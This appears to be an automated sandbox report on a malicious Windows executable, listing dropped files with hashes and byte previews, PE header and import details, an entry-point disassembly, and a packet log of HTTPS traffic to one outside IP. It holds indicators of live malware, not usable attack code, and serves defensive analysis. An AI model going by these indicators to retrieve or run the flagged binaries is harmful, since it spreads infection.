                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                            Category:dropped
                                            Size (bytes):8299
                                            Entropy (8bit):7.9354275320361545
                                            Encrypted:false
                                            SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                            MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                            SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                            SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                            SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                            Malicious:false
                                            Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                            Category:dropped
                                            Size (bytes):135589
                                            Entropy (8bit):7.995304392539578
                                            Encrypted:true
                                            SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                            MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                            SHA1:561836F6228E24180238DF9456707A2443C5795C
                                            SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                            SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                            Malicious:false
                                            Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):28272
                                            Entropy (8bit):7.7114959549251045
                                            Encrypted:false
                                            SSDEEP:384:91egCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQi:m5F1FUdy422IK+gAZt2i0YPpQn4GMd
                                            MD5:B2F6434FC09C8461DE3CEAEE40EAF4AC
                                            SHA1:700D5D9D537EA474E3FC65EE1E963797B0219079
                                            SHA-256:8FEFF2CE88FEFDD30A3D6041E64DA9A19256AF5CF0CA9D479C040E79F4B2698B
                                            SHA-512:1F70B25D408F92E07760AA0DB92DC36F396985457E343823382E7397280B6AFA2C1BB1870976D5E179FF17345F59086F77EA896D3DF918B1E42265B2ED31A4E0
                                            Malicious:false
                                            Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbbJ.bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                            Category:dropped
                                            Size (bytes):3889557
                                            Entropy (8bit):7.9999387567935285
                                            Encrypted:true
                                            SSDEEP:98304:FAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:andLOZS/DtpPJRO8OHBL4f2UQI+A
                                            MD5:DE044C481A72F459A1FCB638B4E59263
                                            SHA1:5B49B9A644CC9AC381837E05FC86F0BA7020F728
                                            SHA-256:52A1541218DAB5A01C2B7F1C45B808807408A7D1F46185503B2A573BB2C00EF2
                                            SHA-512:DC9AA75D4282EA3120D5C3A36693765A1B187DF25839065B6F83F9B15AC8D820F237DC2D373DCB3D3D90578F8579DBF20792494248947988D9702C02A16BE1B7
                                            Malicious:false
                                            Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):133136
                                            Entropy (8bit):6.350273548571922
                                            Encrypted:false
                                            SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                            MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                            SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                            SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                            SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse
                                            • Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse
                                            • Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse
                                            • Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse
                                            • Filename: 23567791246-764698008.02.exe, Detection: malicious, Browse
                                            • Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse
                                            • Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse
                                            • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                            • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                            • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:GIF image data, version 89a, 10 x 10
                                            Category:dropped
                                            Size (bytes):8228
                                            Entropy (8bit):7.9789605513811654
                                            Encrypted:false
                                            SSDEEP:192:YBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:YBuNhyTlBU2dp+1XrBuCgp9vU0l
                                            MD5:1F36B38FACAE47A47B2D606E3D1EB4B6
                                            SHA1:C3D397E45DC42BDF67A6590749BCEC04DE67E187
                                            SHA-256:EF40FA26DEDB9515EDCA4C6B511579567B1D7E000E607948E645B6457F1CB113
                                            SHA-512:5169619B27240BFDCC02D48C914CCA67928C2F79A2DFB49934EBE308E066F38A8B90DCDCB2CF0D7D2F73432FC83A2A104C7F00B0B44FFC12D0B348E6AAE90576
                                            Malicious:false
                                            Preview:GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):122880
                                            Entropy (8bit):6.0020643721575455
                                            Encrypted:false
                                            SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52FH:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gH
                                            MD5:2CC19F28DF5C94B11F7F75F5F0ECDE71
                                            SHA1:26B7C27E689B60560EACCB6C28A6825089397602
                                            SHA-256:CAA6681AA62395BFBCFFE13DBFECC824F700268A0803B630CE3DA29115B46D46
                                            SHA-512:B9A8185F6AF08AD9445E53400E5C176809D9219EEA67DC28C4E98D20749C0CB27D06E7ACBBD7791C9AC0829DD7BFC30967A87CB521C50F1C9FA9A374FF6A399A
                                            Malicious:true
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):28272
                                            Entropy (8bit):6.229014462083437
                                            Encrypted:false
                                            SSDEEP:384:53YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/B:5OUkgfdZ9pRyv+uPzCMHo3q4tDgh7
                                            MD5:915805D845828024619E64F348F57074
                                            SHA1:5853BE1813BE2BEDB6D4369283EF972612CB6A8F
                                            SHA-256:778400920B9E21AB56EBFCAE927D3E3A97C34B34C7BDA55D70A686609F14E471
                                            SHA-512:83847A53835A43A0E38E4395E653F1DF6B2AEEA113AD558C6FB527315A5247D625D1039991CC921DD4C16398C45A5CB146EAF52C0E77E497BC29BE1FE9607E43
                                            Malicious:true
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...............................................(...........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................
                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                            Entropy (8bit):0.10677252461277925
                                            TrID:
                                            • Win64 Executable GUI (202006/5) 92.65%
                                            • Win64 Executable (generic) (12005/4) 5.51%
                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                            • DOS Executable Generic (2002/1) 0.92%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:2362476847-83854387.07.exe
                                            File size:30'958'080 bytes
                                            MD5:d7fbf8a45ea736f05b15de0c985b343d
                                            SHA1:f988e97b3d3a4ab12cc09c73f61f1036c133ac4d
                                            SHA256:889d53f0805721fc02707b8eceadf846274e7e427620e2dda8b7d86c29f034e8
                                            SHA512:ee99d7386709e2b36b13257fb2d5e47ffa64b5a18d1042fed6b0790699e2c4492569e8382901f9234917c56d21c4ac8d472f5a977f040672717ae537fc944284
                                            SSDEEP:3072:rgT9K9c5vw5RbJMyBcL7J67MQoMWiRwS+PZGyuoHo7PaMJ5Hy7Yvi7:rS9Uh5JjBcXo7WngyuiozzY
                                            TLSH:0C6706C622A820E9E0668E358D656501CB76BC33DEE0579F47D5328DCFFA6D08D27B21
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`...$...$...$....9E.!....9G.Y....9F.*.......&.......#.......8.......6....Z..+...$...........%.......%.....K.%.......%...Rich$..
                                            Icon Hash:33618a9a8ecc6113
                                            Entrypoint:0x140004660
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x140000000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                            DLL Characteristics:HIGH_ENTROPY_VA, GUARD_CF, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x66D58989 [Mon Sep 2 09:46:49 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:6
                                            OS Version Minor:0
                                            File Version Major:6
                                            File Version Minor:0
                                            Subsystem Version Major:6
                                            Subsystem Version Minor:0
                                            Import Hash:089ce9b8524e1005a0be3b5c104cbdc2
                                            Instruction
                                            dec eax
                                            sub esp, 28h
                                            call 00007F5EA87E1638h
                                            dec eax
                                            add esp, 28h
                                            jmp 00007F5EA87DDD83h
                                            int3
                                            int3
                                            dec eax
                                            sub esp, 28h
                                            call 00007F5EA87E1BE4h
                                            test eax, eax
                                            je 00007F5EA87E13A3h
                                            dec eax
                                            mov eax, dword ptr [00000030h]
                                            dec eax
                                            mov ecx, dword ptr [eax+08h]
                                            jmp 00007F5EA87E1387h
                                            dec eax
                                            cmp ecx, eax
                                            je 00007F5EA87E1396h
                                            xor eax, eax
                                            dec eax
                                            cmpxchg dword ptr [00015498h], ecx
                                            jne 00007F5EA87E1370h
                                            xor al, al
                                            dec eax
                                            add esp, 28h
                                            ret
                                            mov al, 01h
                                            jmp 00007F5EA87E1379h
                                            int3
                                            int3
                                            int3
                                            inc eax
                                            push ebx
                                            dec eax
                                            sub esp, 20h
                                            movzx eax, byte ptr [000154B3h]
                                            test ecx, ecx
                                            mov ebx, 00000001h
                                            cmove eax, ebx
                                            mov byte ptr [000154A3h], al
                                            call 00007F5EA87E19C7h
                                            call 00007F5EA87E1D9Ah
                                            test al, al
                                            jne 00007F5EA87E1386h
                                            xor al, al
                                            jmp 00007F5EA87E1396h
                                            call 00007F5EA87E3B71h
                                            test al, al
                                            jne 00007F5EA87E138Bh
                                            xor ecx, ecx
                                            call 00007F5EA87E1DB6h
                                            jmp 00007F5EA87E136Ch
                                            mov al, bl
                                            dec eax
                                            add esp, 20h
                                            pop ebx
                                            ret
                                            int3
                                            int3
                                            int3
                                            dec eax
                                            mov dword ptr [esp+08h], ebx
                                            push ebp
                                            dec eax
                                            mov ebp, esp
                                            dec eax
                                            sub esp, 40h
                                            mov ebx, ecx
                                            cmp ecx, 01h
                                            ja 00007F5EA87E142Ch
                                            call 00007F5EA87E1B48h
                                            test eax, eax
                                            je 00007F5EA87E13ADh
                                            test ebx, ebx
                                            jne 00007F5EA87E13A9h
                                            dec eax
                                            lea ecx, dword ptr [00015418h]
                                            Programming Language:
                                            • [RES] VS2015 UPD3 build 24213
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x17e200x8c.rdata
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x17eac0x64.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d750000x14ae4.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d740000xc0c.pdata
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d8a0000x688.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x16fc00x70.rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x170300x94.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0xe0000x268.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000xcf7e0xd000dc0e496cc62a72841a0f6eed3d85213dFalse0.5729041466346154zlib compressed data6.352236690190385IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0xe0000xa70a0xa800ac98e728dcc5f02cfff40dd332b9966aFalse0.41785249255952384data4.750739758604996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x190000x1d5ad200x1d58400cfaccd625cbd4e03f86b1c9b77242af8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .pdata0x1d740000xc0c0xe000c591ba9e353c9ded8d5ff8e8f0bef93False0.4193638392857143data4.2782412766768365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .rsrc0x1d750000x14ae40x14c007a8b0f70e135a8d2081018975a06b968False0.07067724021084337data2.670291778313336IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x1d8a0000x6880x800825b80d9b29cec6ca30f892061443ec3False0.55322265625data4.9083931410179265IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x1d751c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.12095435684647303
                                            RT_ICON0x1d777680x10828Device independent bitmap graphic, 128 x 256 x 32, image size 00.04467348870223589
                                            RT_ICON0x1d87f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.18409943714821764
                                            RT_ICON0x1d890380x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.2925531914893617
                                            RT_GROUP_ICON0x1d894a00x3edata0.8870967741935484
                                            RT_VERSION0x1d894e00x2ccdata0.4511173184357542
                                            RT_MANIFEST0x1d897ac0x336XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (762), with CRLF line terminatorsEnglishUnited States0.5048661800486618
                                            DLLImport
                                            KERNEL32.dllSetStdHandle, WriteConsoleW, GetProcAddress, ExitProcess, HeapAlloc, GetProcessHeap, GetModuleHandleW, LoadLibraryW, GetFileAttributesW, CreateFileW, GetUserDefaultUILanguage, GetModuleFileNameW, GetStdHandle, GetCommandLineW, RaiseException, SetFilePointerEx, HeapReAlloc, HeapSize, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, FlushFileBuffers, WriteFile, CloseHandle, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, RtlUnwindEx, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetFileType, GetCurrentProcess, GetModuleFileNameA, TerminateProcess, GetModuleHandleExW, GetACP, LCMapStringW, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStringTypeW, GetConsoleCP, VirtualAlloc, HeapFree
                                            SHELL32.dllCommandLineToArgvW
                                            USER32.dllMessageBoxExW
                                            SHLWAPI.dllStrCmpW
                                            NameOrdinalAddress
                                            AmdPowerXpressRequestBetterBatteryLife10x140019900
                                            NvOptimusDisablement20x140019904
                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Download Network PCAP: filteredfull

                                            • Total Packets: 748
                                            • 443 (HTTPS)
                                            • 53 (DNS)
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 9, 2025 04:27:26.991698980 CET4944753192.168.2.71.1.1.1
                                            Jan 9, 2025 04:27:26.996515036 CET53494471.1.1.1192.168.2.7
                                            Jan 9, 2025 04:27:26.996608973 CET4944753192.168.2.71.1.1.1
                                            Jan 9, 2025 04:27:27.001714945 CET53494471.1.1.1192.168.2.7
                                            Jan 9, 2025 04:27:27.468805075 CET4944753192.168.2.71.1.1.1
                                            Jan 9, 2025 04:27:27.473828077 CET53494471.1.1.1192.168.2.7
                                            Jan 9, 2025 04:27:27.473928928 CET4944753192.168.2.71.1.1.1
                                            Jan 9, 2025 04:28:28.452186108 CET49681443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:28.452270985 CET4434968159.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:28.452368975 CET49681443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:28.459295034 CET49681443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:28.459342957 CET4434968159.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:29.723952055 CET4434968159.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:29.724087954 CET49681443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:29.724870920 CET4434968159.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:29.728420973 CET49681443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:29.776619911 CET49681443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:29.776638985 CET4434968159.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:29.777049065 CET4434968159.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:29.777105093 CET49681443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:29.778758049 CET49681443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:29.823329926 CET4434968159.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:30.110411882 CET4434968159.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:30.110490084 CET4434968159.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:30.110502005 CET49681443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:30.110539913 CET49681443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:30.116137028 CET49681443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:30.116164923 CET4434968159.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:30.250617027 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:30.250657082 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:30.250735044 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:30.250955105 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:30.250967979 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.520776033 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.520900965 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:31.521414995 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:31.521425009 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.521619081 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:31.521622896 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.863907099 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.863938093 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.864032030 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:31.864059925 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.864072084 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:31.864106894 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:31.864114046 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.864170074 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:31.864634037 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:31.864691019 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.101142883 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.101190090 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.101265907 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.101274967 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.101309061 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.101332903 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.104748964 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.104784012 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.104814053 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.104820013 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.104842901 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.104862928 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.104938984 CET4434968259.110.190.44192.168.2.7
